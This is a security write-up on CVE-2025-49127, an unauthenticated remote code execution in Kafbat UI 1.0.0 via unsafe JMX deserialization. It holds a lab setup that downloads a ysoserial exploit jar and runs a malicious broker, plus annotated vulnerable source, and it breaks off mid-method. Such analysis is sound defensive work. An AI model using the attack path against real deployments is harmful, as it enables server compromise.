CVE-2025-49127: Kafbat UI Remote Code Execution via JMX Unsafe Deserialization

July 14, 2025

CVE-2025-49127 is a critical remote code execution vulnerability affecting Kafbat UI version 1.0.0. It allows an unauthenticated user to execute arbitrary code on the server through unsafe deserialization when the application connects to a malicious JMX service. The issue stems from the dynamic cluster configuration functionality, which accepts user-provided cluster settings, including the JMX metrics endpoint, without proper validation. When the application then connects to an attacker-controlled JMX server, it deserializes whatever objects that server returns.

CVE Details:

  • CVE ID: CVE-2025-49127
  • Severity: Critical
  • Affected Version: Kafbat UI 1.0.0
  • Fixed Version: 1.1.0
  • Vulnerability Type: Unsafe Deserialization / Remote Code Execution
  • Attack Vector: Network
  • Authentication Required: None

What is Kafbat UI?

Kafbat UI is a web-based user interface for managing Apache Kafka clusters. It gives administrators a dashboard to monitor, configure, and manage Kafka environments. Key features include:

  • Cluster Management: Dynamic addition and configuration of Kafka clusters
  • Metrics Collection: Integration with JMX and Prometheus for monitoring broker performance
  • Topic Management: Creation, deletion, and configuration of Kafka topics
  • Consumer Group Monitoring: Real-time tracking of consumer group offsets and lag
  • Schema Registry Integration: Management of Avro, JSON, and Protobuf schemas
  • Connect Cluster Management: Integration with Kafka Connect for connector management

The application supports dynamic configuration changes, allowing administrators to add new clusters and modify settings without restarting the application. This flexibility, while convenient, becomes a security vulnerability when combined with unsafe JMX connections.

Lab Setup

To reproduce this vulnerability, we need to set up a vulnerable Kafbat UI environment and create the malicious infrastructure for exploitation.

Step 1: Prepare the Environment

# Create working directory
mkdir kafbat-ui-cve-lab
cd kafbat-ui-cve-lab

# Download the modified ysoserial tool
wget https://github.com/trganda/ysoserial/releases/download/v0.0.6/ysoserial-0.0.6-all.jar

# Create scripts directory
mkdir scripts

Step 2: Create the Docker Compose Configuration

Create a docker-compose.yml file with the vulnerable setup:

version: '3.8'
name: "kafbat-ui-cve-lab"

services:
  zookeeper:
    image: 'confluentinc/cp-zookeeper:7.6.1'
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181

  kafbat-ui:
    container_name: kafbat-ui
    image: ghcr.io/kafbat/kafka-ui:v1.0.0  # Vulnerable version
    ports:
      - 8080:8080
      - 5005:5005
    depends_on:
      - kafka0
    environment:
      KAFKA_CLUSTERS_0_NAME: local
      KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka0:29092
      KAFKA_CLUSTERS_0_METRICS_PORT: 9997
      DYNAMIC_CONFIG_ENABLED: 'true'  # Enable dynamic configuration
      JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005'

  kafka0:
    image: confluentinc/cp-kafka:7.2.1
    hostname: kafka0
    container_name: kafka0
    ports:
      - 9092:9092
      - 9997:9997
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,CONTROLLER:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka0:29092,PLAINTEXT_HOST://localhost:9092
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
      KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS: 0
      KAFKA_TRANSACTION_STATE_LOG_MIN_ISR: 1
      KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
      KAFKA_PROCESS_ROLES: 'broker,controller'
      KAFKA_NODE_ID: 1
      KAFKA_CONTROLLER_QUORUM_VOTERS: '1@kafka0:29093'
      KAFKA_LISTENERS: 'PLAINTEXT://kafka0:29092,CONTROLLER://kafka0:29093,PLAINTEXT_HOST://0.0.0.0:9092'
      KAFKA_CONTROLLER_LISTENER_NAMES: 'CONTROLLER'
      KAFKA_LOG_DIRS: '/tmp/kraft-combined-logs'
      KAFKA_JMX_PORT: 9997
      KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=kafka0 -Dcom.sun.management.jmxremote.rmi.port=9997

  # Malicious Kafka broker that advertises evil JMX endpoint
  kafka-malicious-broker:
    image: 'confluentinc/cp-kafka:7.2.1'
    depends_on:
      - zookeeper
    ports:
      - 9093:9093
    environment:
      KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
      # Replace with your actual host IP - this is where the malicious JMX server will run
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://YOUR_HOST_IP:9093
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT

Step 3: Start the Environment

# Replace YOUR_HOST_IP with your actual host IP (192.168.1.100 below is only an example)
sed -i 's/YOUR_HOST_IP/192.168.1.100/g' docker-compose.yml

# Start the environment
docker-compose up -d

# Verify services are running
docker-compose ps

Step 4: Verify Kafbat UI Access

Navigate to http://localhost:8080 to confirm that Kafbat UI is running and accessible.

The Analysis

CVE-2025-49127 is a multi-layered flaw that abuses the dynamic configuration capabilities of Kafbat UI to reach unsafe Java deserialization in JMX connections. The attack uses the application's legitimate metrics collection functionality to make it connect to an attacker-controlled JMX server, which returns malicious serialized objects that execute arbitrary code when the client deserializes them.


The vulnerability originates in the ApplicationConfigController class, which handles dynamic configuration changes through the /api/config REST endpoint. The validateConfig method begins by building an access context with AccessContext.builder().applicationConfigActions(EDIT).operationName("validateConfig").build(), which is intended to enforce role-based access control. However, deployments often run with authentication disabled (auth.type: DISABLED), and in that case the check does not restrict anyone. The method then processes the incoming configuration in its flatMap step, where DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties()) converts user-provided input directly into internal data structures without sanitizing or validating the cluster configuration contents.

ApplicationConfigController.java – validateConfig method:

@Override
public Mono<ResponseEntity<ApplicationConfigValidationDTO>> validateConfig(Mono<ApplicationConfigDTO> configDto,
                                                                           ServerWebExchange exchange) {
    // ISSUE 1: Access control bypass potential
    var context = AccessContext.builder()
        .applicationConfigActions(EDIT)  // Requires EDIT permission
        .operationName("validateConfig")
        .build();
    
    return validateAccess(context)                    // RBAC check happens here
        .then(configDto)                              // Process incoming configuration
        .flatMap(config -> {
            // ISSUE 2: Unsafe mapping from DTO without sanitization
            DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties());
            ClustersProperties clustersProperties = newConfig.getKafka();
            
            // CRITICAL: This triggers the vulnerable validation chain
            return validateClustersConfig(clustersProperties)
                .map(validations -> new ApplicationConfigValidationDTO().clusters(validations));
        })
        .map(ResponseEntity::ok)
        .doOnEach(sig -> audit(context, sig));       // Audit after potential exploitation
}

The most critical aspect lies in the subsequent call to validateClustersConfig(clustersProperties), which triggers a validation chain that has the dangerous side effect of opening real connections to user-specified endpoints. Validation here is an active operation rather than a passive check, so simply submitting a malicious configuration can start the interaction with attacker infrastructure, whether or not the configuration is ultimately accepted.

The persistence mechanism has further problems in the restartWithConfig method. Malicious configurations are written to disk through dynamicConfigOperations.persist(newConfig) without deep validation, and the application then restarts via restarter.requestRestart(), loading the malicious configuration system-wide and creating a persistent attack vector.

ApplicationConfigController.java – restartWithConfig method:

@Override
public Mono<ResponseEntity<Void>> restartWithConfig(Mono<RestartRequestDTO> restartRequestDto,
                                                  ServerWebExchange exchange) {
    var context = AccessContext.builder()
        .applicationConfigActions(EDIT)
        .operationName("restartWithConfig")
        .build();
    return validateAccess(context)
        .then(restartRequestDto)
        .doOnNext(restartDto -> {
            // ISSUE 3: Configuration persisted without deep validation
            var newConfig = MAPPER.fromDto(restartDto.getConfig().getProperties());
            dynamicConfigOperations.persist(newConfig);              // Writes malicious config to disk
        })
        .doOnEach(sig -> audit(context, sig))
        .doOnSuccess(dto -> restarter.requestRestart())              // ISSUE 4: Triggers app restart with malicious config
        .map(dto -> ResponseEntity.ok().build());
}

Moving deeper into the configuration processing layer, the DynamicConfigOperations class reveals additional weaknesses in how configurations are persisted and loaded. The persist method begins with a call to checkIfDynamicConfigEnabled(), which only verifies that the dynamic configuration feature is enabled and performs no content validation. It then calls properties.initAndValidate(), but this only performs basic structural validation through ClustersProperties::validateAndSetDefaults. It does not inspect the values being configured, in particular the JMX endpoint settings that are central to this vulnerability.

DynamicConfigOperations.java – persist method:

public void persist(PropertiesStructure properties) {
    checkIfDynamicConfigEnabled();                       // Only checks if feature is enabled
    properties.initAndValidate();                        // ISSUE: Insufficient validation

    String yaml = serializeToYaml(properties);          // Serializes malicious config
    writeYamlToFile(yaml, dynamicConfigFilePath());     // Writes to disk without deep inspection
}

The persistence mechanism itself adds risk. The persist method serializes the configuration with String yaml = serializeToYaml(properties), and writeYamlToFile then writes it directly to disk with Files.writeString(path, yaml, StandardOpenOption.CREATE, StandardOpenOption.WRITE, StandardOpenOption.TRUNCATE_EXISTING). No content inspection or validation of the YAML happens at this point, so a malicious JMX configuration is stored on the filesystem and remains there until it is overwritten.

DynamicConfigOperations.java – writeYamlToFile method:

@SneakyThrows
private void writeYamlToFile(String yaml, Path path) {
    // ISSUE: No content validation of YAML before writing
    if (Files.isDirectory(path)) {
        throw new ValidationException("Dynamic file path is a directory, but should be a file path");
    }
    if (!Files.exists(path.getParent())) {
        Files.createDirectories(path.getParent());
    }
    if (Files.exists(path) && !Files.isWritable(path)) {
        throw new ValidationException("File already exists and is not writable");
    }
    try {
        Files.writeString(path, yaml,                    // VULNERABLE: Writes malicious YAML
            StandardOpenOption.CREATE,
            StandardOpenOption.WRITE,
            StandardOpenOption.TRUNCATE_EXISTING
        );
    } catch (IOException e) {
        throw new ValidationException("Error writing to " + path, e);
    }
}
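
As a rough illustration of the persistence step above, the following self-contained sketch writes a YAML string with the same three StandardOpenOption flags and reads it back. The class name PersistSketch, the temporary file, and the sample YAML values are assumptions made for this example and are not taken from Kafbat UI. The point is only that the text reaches the disk verbatim, with no inspection of what it contains.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;

// Hypothetical demo class; not part of Kafbat UI.
class PersistSketch {

    // Writes the text to the path, replacing any previous content.
    static void writeYaml(String yaml, Path path) {
        try {
            Files.writeString(path, yaml,
                StandardOpenOption.CREATE,
                StandardOpenOption.WRITE,
                StandardOpenOption.TRUNCATE_EXISTING);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Writes a placeholder, overwrites it with the given YAML, and returns
    // what is on disk afterwards.
    static String roundTrip(String yaml) {
        try {
            Path tmp = Files.createTempFile("dynamic_config", ".yaml");
            try {
                writeYaml("placeholder that will be truncated\n", tmp);
                writeYaml(yaml, tmp);
                return Files.readString(tmp);
            } finally {
                Files.deleteIfExists(tmp);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        // Sample values are made up for illustration.
        String yaml = "kafka:\n  clusters:\n    - name: demo\n"
            + "      metrics:\n        type: JMX\n        port: 1718\n";
        System.out.println(roundTrip(yaml).equals(yaml));
    }
}
```

Because TRUNCATE_EXISTING discards the previous file content, whatever configuration was submitted last is what the application will see on its next start.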

The configuration loading process compounds this issue. The loadDynamicPropertySource method automatically loads these potentially malicious configurations at application startup using new YamlPropertySourceLoader().load("dynamicProperties", new FileSystemResource(configPath)), creating a persistent attack vector that survives application restarts.

DynamicConfigOperations.java – loadDynamicPropertySource method:

@SneakyThrows
public Optional<PropertySource<?>> loadDynamicPropertySource() {
    if (dynamicConfigEnabled()) {
        Path configPath = dynamicConfigFilePath();
        if (!Files.exists(configPath) || !Files.isReadable(configPath)) {
            log.warn("Dynamic config file {} doesnt exist or not readable", configPath);
            return Optional.empty();
        }
        var propertySource = new CompositePropertySource("dynamicProperties");
        new YamlPropertySourceLoader()
            .load("dynamicProperties", new FileSystemResource(configPath))  // VULNERABLE: Loads malicious YAML
            .forEach(propertySource::addPropertySource);
        log.info("Dynamic config loaded from {}", configPath);
        return Optional.of(propertySource);
    }
    return Optional.empty();
}

The KafkaClusterFactory class shows another weakness in the cluster creation process. The create method builds cluster objects directly from user-provided configuration properties without validation, particularly in how it handles the metrics configuration through metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()). That method creates a MetricsConfig object in which both the type and the port are copied straight from user input using builder.type(metricsConfigData.getType()) and builder.port(metricsConfigData.getPort()), with no check that the values are safe or reasonable. The type field accepts "JMX" without question, which selects the vulnerable code path, while the port field accepts any integer the attacker specifies.

KafkaClusterFactory.java – create method:

public KafkaCluster create(ClustersProperties properties, 
                          ClustersProperties.Cluster clusterProperties) {
    KafkaCluster.KafkaClusterBuilder builder = KafkaCluster.builder();

    builder.name(clusterProperties.getName());
    builder.bootstrapServers(clusterProperties.getBootstrapServers());  // User-controlled
    builder.properties(convertProperties(clusterProperties.getProperties()));
    builder.readOnly(clusterProperties.isReadOnly());
    
    // ... other configurations ...
    
    if (metricsConfigured(clusterProperties)) {
        // CRITICAL: Creates metrics config from user input without validation
        builder.metricsConfig(metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()));
    }
    builder.originalProperties(clusterProperties);        // Preserves original malicious config
    return builder.build();
}

KafkaClusterFactory.java – metricsConfigDataToMetricsConfig method:

@Nullable
private MetricsConfig metricsConfigDataToMetricsConfig(ClustersProperties.MetricsConfigData metricsConfigData) {
    if (metricsConfigData == null) {
        return null;
    }
    MetricsConfig.MetricsConfigBuilder builder = MetricsConfig.builder();
    builder.type(metricsConfigData.getType());           // ISSUE: Type not validated ("JMX" accepted)
    builder.port(metricsConfigData.getPort());           // ISSUE: Port not validated (attacker-controlled)
    builder.ssl(Optional.ofNullable(metricsConfigData.getSsl()).orElse(false));
    builder.username(metricsConfigData.getUsername());   // Can be null
    builder.password(metricsConfigData.getPassword());   // Can be null
    builder.keystoreLocation(metricsConfigData.getKeystoreLocation());
    builder.keystorePassword(metricsConfigData.getKeystorePassword());
    return builder.build();
}
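
To make "no validation" concrete, here is a minimal sketch of the kind of field-level check that is absent from the method above. Everything in it (the class MetricsConfigCheck, the allow-list, the error messages) is hypothetical and not part of Kafbat UI. Note also that checks like these would not stop the attack on their own: an attacker can choose a valid type and a valid port, so the target host still has to be restricted separately.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;

// Hypothetical helper for illustration; not part of Kafbat UI.
class MetricsConfigCheck {

    // Assumed allow-list of metrics types.
    private static final Set<String> ALLOWED_TYPES = Set.of("JMX", "PROMETHEUS");

    // Returns a list of problems found in the user-supplied type and port.
    // A null type is accepted because the collector treats it as the default.
    static List<String> check(String type, Integer port) {
        List<String> errors = new ArrayList<>();
        if (type != null && !ALLOWED_TYPES.contains(type.toUpperCase(Locale.ROOT))) {
            errors.add("unsupported metrics type: " + type);
        }
        if (port == null || port < 1 || port > 65535) {
            errors.add("metrics port out of range: " + port);
        }
        return errors;
    }

    public static void main(String[] args) {
        System.out.println(check("JMX", 9997));
        System.out.println(check("something-else", 70000));
    }
}
```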

Perhaps most critically, the cluster validation process in the validate method never validates JMX endpoints. The method validates the Kafka connection, Schema Registry, KSQL, and Connect endpoints through their respective validation calls, but there is no corresponding validation for JMX metrics endpoints. This is a design flaw: the application validates most external connections but ignores the security implications of JMX connections, so a malicious JMX configuration passes validation unconditionally.

KafkaClusterFactory.java – validate method:

public Mono<ClusterConfigValidationDTO> validate(ClustersProperties.Cluster clusterProperties) {
    // SSL validation - not related to JMX vulnerability
    if (clusterProperties.getSsl() != null) {
        Optional<String> errMsg = KafkaServicesValidation.validateTruststore(clusterProperties.getSsl());
        if (errMsg.isPresent()) {
            return Mono.just(new ClusterConfigValidationDTO()
                .kafka(new ApplicationPropertyValidationDTO()
                    .error(true)
                    .errorMessage("Truststore not valid: " + errMsg.get())));
        }
    }

    return Mono.zip(
        // Validates Kafka connection - NOT JMX
        KafkaServicesValidation.validateClusterConnection(
            clusterProperties.getBootstrapServers(),
            convertProperties(clusterProperties.getProperties()),
            clusterProperties.getSsl()
        ),
        // Schema Registry validation (not JMX related)
        schemaRegistryConfigured(clusterProperties)
            ? KafkaServicesValidation.validateSchemaRegistry(() -> schemaRegistryClient(clusterProperties)).map(Optional::of)
            : Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
        
        // KSQL validation (not JMX related)  
        ksqlConfigured(clusterProperties)
            ? KafkaServicesValidation.validateKsql(() -> ksqlClient(clusterProperties)).map(Optional::of)
            : Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),

        // Connect validation (not JMX related)
        connectClientsConfigured(clusterProperties) ? 
            Flux.fromIterable(clusterProperties.getKafkaConnect())
                .flatMap(c -> KafkaServicesValidation.validateConnect(() -> connectClient(clusterProperties, c))
                    .map(r -> Tuples.of(c.getName(), r)))
                .collectMap(Tuple2::getT1, Tuple2::getT2)
                .map(Optional::of)
            : Mono.<Optional<Map<String, ApplicationPropertyValidationDTO>>>just(Optional.empty())
    ).map(tuple -> {
        var validation = new ClusterConfigValidationDTO();
        validation.kafka(tuple.getT1());
        tuple.getT2().ifPresent(validation::schemaRegistry);
        tuple.getT3().ifPresent(validation::ksqldb);
        tuple.getT4().ifPresent(validation::kafkaConnects);
        return validation;
        // CRITICAL OBSERVATION: NO JMX VALIDATION PERFORMED!
    });
}

The vulnerability is triggered automatically through the ClustersStatisticsScheduler, which contains a scheduled method annotated with @Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}") that runs every 30 seconds by default. The scheduler iterates over all configured clusters using Flux.fromIterable(clustersStorage.getKafkaClusters()) and calls statisticsService.updateCache(cluster) for each one, including any malicious clusters that have been configured. The use of .parallel().runOn(Schedulers.parallel()) means that multiple clusters are processed concurrently, and the final .block() call makes the scheduled method wait for all of them, so exploitation of one cluster can potentially affect the stability of the entire application.

ClustersStatisticsScheduler.java – updateStatistics method:

@Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}")
public void updateStatistics() {
    Flux.fromIterable(clustersStorage.getKafkaClusters())    // Includes malicious clusters
        .parallel()
        .runOn(Schedulers.parallel())
        .flatMap(cluster -> {
            log.debug("Start getting metrics for kafkaCluster: {}", cluster.getName());
            return statisticsService.updateCache(cluster)    // TRIGGERS VULNERABILITY
                .doOnSuccess(m -> log.debug("Metrics updated for cluster: {}", cluster.getName()));
        })
        .then()
        .block();                                           // Synchronous execution
}

The StatisticsService orchestrates metrics collection through its getStatistics method, which calls metricsCollector.getBrokerMetrics(cluster, description.getNodes()) as part of a larger Mono.zip operation. This call sits in the normal application flow and is not treated as a potentially dangerous operation, so no additional safeguards are applied. The method retrieves the broker nodes from the Kafka cluster description and passes them directly to the metrics collector, which then attempts to collect metrics from each node using the configured JMX settings.

StatisticsService.java – getStatistics method:

private Mono<Statistics> getStatistics(KafkaCluster cluster) {
    return adminClientService.get(cluster).flatMap(ac ->
        ac.describeCluster().flatMap(description ->
            ac.updateInternalStats(description.getController()).then(
                Mono.zip(
                    List.of(
                        metricsCollector.getBrokerMetrics(cluster, description.getNodes()),  // VULNERABLE CALL
                        getLogDirInfo(description, ac),
                        featureService.getAvailableFeatures(ac, cluster, description),
                        loadTopicConfigs(cluster),
                        describeTopics(cluster)),
                    results ->
                        Statistics.builder()
                            .status(ServerStatusDTO.ONLINE)
                            .clusterDescription(description)
                            .version(ac.getVersion())
                            .metrics((Metrics) results[0])                    // Contains exploited metrics
                            .logDirInfo((InternalLogDirStats) results[1])
                            .features((List<ClusterFeature>) results[2])
                            .topicConfigs((Map<String, List<ConfigEntry>>) results[3])
                            .topicDescriptions((Map<String, TopicDescription>) results[4])
                            .build()
                ))))
        .doOnError(e -> log.error("Failed to collect cluster {} info", cluster.getName(), e))
        .onErrorResume(e -> Mono.just(Statistics.empty().toBuilder().lastKafkaException(e).build()));
}

The MetricsCollector class contains the logic that decides whether to use JMX or Prometheus for metrics collection. In the getMetrics method, the decision is a simple type check: if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)). JMX is therefore the default whenever no type is specified, as well as when the type is explicitly set to "JMX". This default is dangerous because any cluster configuration that includes metrics settings will attempt JMX connections unless it is explicitly configured otherwise. The method then calls jmxMetricsRetriever.retrieve(kafkaCluster, node) directly, which starts the vulnerable connection process.

MetricsCollector.java – getBrokerMetrics and getMetrics methods:

public Mono<Metrics> getBrokerMetrics(KafkaCluster cluster, Collection<Node> nodes) {
    return Flux.fromIterable(nodes)
        .flatMap(n -> getMetrics(cluster, n).map(lst -> Tuples.of(n, lst)))   // VULNERABLE: Processes each node
        .collectMap(Tuple2::getT1, Tuple2::getT2)
        .map(nodeMetrics -> collectMetrics(cluster, nodeMetrics))
        .defaultIfEmpty(Metrics.empty());
}

private Mono<List<RawMetric>> getMetrics(KafkaCluster kafkaCluster, Node node) {
    Flux<RawMetric> metricFlux = Flux.empty();
    if (kafkaCluster.getMetricsConfig() != null) {
        String type = kafkaCluster.getMetricsConfig().getType();
        // CRITICAL: JMX type triggers vulnerable code path
        if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)) {
            metricFlux = jmxMetricsRetriever.retrieve(kafkaCluster, node);     // VULNERABLE CALL
        } else if (type.equalsIgnoreCase(MetricsConfig.PROMETHEUS_METRICS_TYPE)) {
            metricFlux = prometheusMetricsRetriever.retrieve(kafkaCluster, node);
        }
    }
    return metricFlux.collectList();
}
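
The branch logic above can be isolated into a small, runnable sketch that shows which retriever each type value would select. The class RetrieverChoice and the returned labels are invented for this example, and the constant values "JMX" and "PROMETHEUS" are assumed rather than copied from the project.

```java
// Hypothetical stand-in for the type check in getMetrics; not Kafbat UI code.
class RetrieverChoice {

    // Assumed values of the MetricsConfig constants.
    static final String JMX_METRICS_TYPE = "JMX";
    static final String PROMETHEUS_METRICS_TYPE = "PROMETHEUS";

    // Mirrors the if / else-if structure: a missing type falls through to JMX,
    // and an unrecognised type selects no retriever at all.
    static String choose(boolean metricsConfigured, String type) {
        if (!metricsConfigured) {
            return "none";
        }
        if (type == null || type.equalsIgnoreCase(JMX_METRICS_TYPE)) {
            return "jmx";
        }
        if (type.equalsIgnoreCase(PROMETHEUS_METRICS_TYPE)) {
            return "prometheus";
        }
        return "none";
    }

    public static void main(String[] args) {
        System.out.println(choose(true, null));
        System.out.println(choose(true, "prometheus"));
    }
}
```

The case worth noticing is the null type: a configuration that supplies only a metrics port still ends up on the JMX path.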

The core of the vulnerability resides in the JmxMetricsRetriever class, specifically in the retrieveSync method. This method builds the JMX URL by plain string concatenation: String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE. Breaking the construction down reveals the flaw. JMX_URL is the constant "service:jmx:rmi:///jndi/rmi://". node.host() is the host advertised by a broker in the cluster metadata, and since the attacker chooses the bootstrap servers, the attacker's broker decides what that host is. c.getMetricsConfig().getPort() comes from the user-controlled metrics port configuration, and JMX_SERVICE_TYPE is the constant "jmxrmi". The result is a URL like "service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi" in which both the host and the port are controlled by the attacker.

JmxMetricsRetriever.java – retrieveSync method:

@SneakyThrows
private List<RawMetric> retrieveSync(KafkaCluster c, Node node) {
    // VULNERABILITY 1: Unsafe string concatenation with user-controlled input
    String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE;
    /*
     * Breaking down the URL construction:
     * - JMX_URL = "service:jmx:rmi:///jndi/rmi://"  (constant)
     * - node.host() = ATTACKER CONTROLLED: host advertised by the broker reached via bootstrapServers
     * - c.getMetricsConfig().getPort() = USER CONTROLLED via metrics.port config  
     * - JMX_SERVICE_TYPE = "jmxrmi" (constant)
     * 
     * Result: service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi
     */
    
    log.debug("Collection JMX metrics for {}", jmxUrl);
    List<RawMetric> result = new ArrayList<>();
    
    // VULNERABILITY 2: Connects to attacker-controlled endpoint
    withJmxConnector(jmxUrl, c, jmxConnector -> getMetricsFromJmx(jmxConnector, result));
    
    log.debug("{} metrics collected for {}", result.size(), jmxUrl);
    return result;
}
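
The URL construction can be reproduced in isolation. The sketch below rebuilds the string from the two constants quoted above and parses it with the JDK's javax.management.remote.JMXServiceURL to show how the pieces are interpreted. It never opens a connection. The class name JmxUrlSketch and the host attacker.example with port 1718 are placeholders chosen for this example.

```java
import java.net.MalformedURLException;
import javax.management.remote.JMXServiceURL;

// Hypothetical demo class; only builds and parses the URL, never connects.
class JmxUrlSketch {

    static final String JMX_URL = "service:jmx:rmi:///jndi/rmi://";
    static final String JMX_SERVICE_TYPE = "jmxrmi";

    // Same concatenation as in retrieveSync, with host and port as parameters.
    static String build(String host, int port) {
        return JMX_URL + host + ":" + port + "/" + JMX_SERVICE_TYPE;
    }

    // Parses the string form; rethrows as unchecked to keep callers simple.
    static JMXServiceURL parse(String url) {
        try {
            return new JMXServiceURL(url);
        } catch (MalformedURLException e) {
            throw new IllegalArgumentException(e);
        }
    }

    public static void main(String[] args) {
        String url = build("attacker.example", 1718);
        JMXServiceURL parsed = parse(url);
        System.out.println(url);
        System.out.println("protocol: " + parsed.getProtocol());
        System.out.println("url path: " + parsed.getURLPath());
    }
}
```

The attacker-chosen host and port end up inside the URL path as a JNDI lookup target (rmi://host:port/jmxrmi), which is the RMI registry the connector will contact.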

The actual connection attempt occurs in the withJmxConnector method, which first prepares the connection environment through prepareJmxEnvAndSetThreadLocal(c) and then creates a JMX connector using JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env). The vulnerability is triggered when the code calls connector.connect(env), which initiates an RMI handshake with the attacker-controlled server. This is where the unsafe deserialization occurs, because JMX over RMI uses Java serialization for communication between client and server.

JmxMetricsRetriever.java – withJmxConnector method:

private void withJmxConnector(String jmxUrl,
                              KafkaCluster c,
                              Consumer<JMXConnector> consumer) {
    var env = prepareJmxEnvAndSetThreadLocal(c);                    // Prepare connection environment
    try (JMXConnector connector = JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env)) {
        try {
            // VULNERABILITY 3: Unsafe connection to attacker endpoint
            connector.connect(env);
            /*
             * This is where the deserialization vulnerability is triggered:
             * 1. JMXConnector.connect() initiates RMI handshake
             * 2. RMI protocol uses Java serialization for object exchange
             * 3. Malicious JMX server returns crafted serialized objects
             * 4. Client-side deserialization occurs without filtering
             * 5. Gadget chains (e.g., CommonsCollections) execute arbitrary code
             */
        } catch (Exception exception) {
            log.error("Error connecting to {}", jmxUrl, exception);
            return;                                                // Early return on connection failure
        }
        consumer.accept(connector);                                // Process successful connection
    } catch (Exception e) {
        log.error("Error getting jmx metrics from {}", jmxUrl, e);
    } finally {
        JmxSslSocketFactory.clearThreadLocalContext();            // Clean up SSL context
    }
}
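
The comment above notes that client-side deserialization happens without filtering. For readers unfamiliar with what filtering means here, the following sketch uses the JDK's ObjectInputFilter (available since Java 9) on a plain ObjectInputStream. It is a generic illustration of the mechanism, not the Kafbat UI fix and not a JMX-specific configuration. The class FilterSketch and the pattern string are assumptions for this example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;
import java.util.HashMap;

// Hypothetical demo class showing a deserialization allow-list.
class FilterSketch {

    // Allow java.lang classes only; "!*" rejects every other class.
    static final String PATTERN = "java.lang.*;!*";

    static byte[] serialize(Object o) {
        try (ByteArrayOutputStream bos = new ByteArrayOutputStream();
             ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
            oos.flush();
            return bos.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Returns true if the payload deserialized, false if the filter rejected it.
    static boolean accepts(byte[] payload, String pattern) {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(pattern);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            ois.setObjectInputFilter(filter);
            ois.readObject();
            return true;
        } catch (InvalidClassException rejected) {
            // Thrown when the filter returns REJECTED for a class in the stream.
            return false;
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(accepts(serialize(Integer.valueOf(42)), PATTERN));
        System.out.println(accepts(serialize(new HashMap<String, String>()), PATTERN));
    }
}
```

With a filter like this in place, a class outside the allow-list is refused before its readObject logic runs, which is the step a gadget chain depends on.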

During the RMI handshake and the subsequent JMX operations, there are multiple deserialization points where malicious objects can be injected. The initial handshake involves an object exchange between client and server, in which the server can return crafted serialized objects that are deserialized on the client side. Further deserialization occurs during MBean operations: when the code calls msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null) to query for MBeans matching "kafka.server*:*", and when individual attributes are retrieved through msc.getAttribute(objectName, attrNames[i].getName()). Each of these operations serializes and deserializes Java objects, giving the attacker several opportunities for exploitation.

JmxMetricsRetriever.java – getMetricsFromJmx method:

@SneakyThrows
private void getMetricsFromJmx(JMXConnector jmxConnector, List<RawMetric> sink) {
    MBeanServerConnection msc = jmxConnector.getMBeanServerConnection();     // Get MBean server connection
    
    var jmxMetrics = msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null);  // Query MBeans
    /*
     * CANONICAL_NAME_PATTERN = "kafka.server*:*"
     * This queries for all MBeans matching Kafka server pattern
     * 
     * VULNERABILITY 4: Additional deserialization risk
     * - queryNames() deserializes the set of ObjectName values returned by the server
     * - The ObjectName pattern itself is a local constant; the risk lies in the response
     */
    
    for (ObjectName jmxMetric : jmxMetrics) {
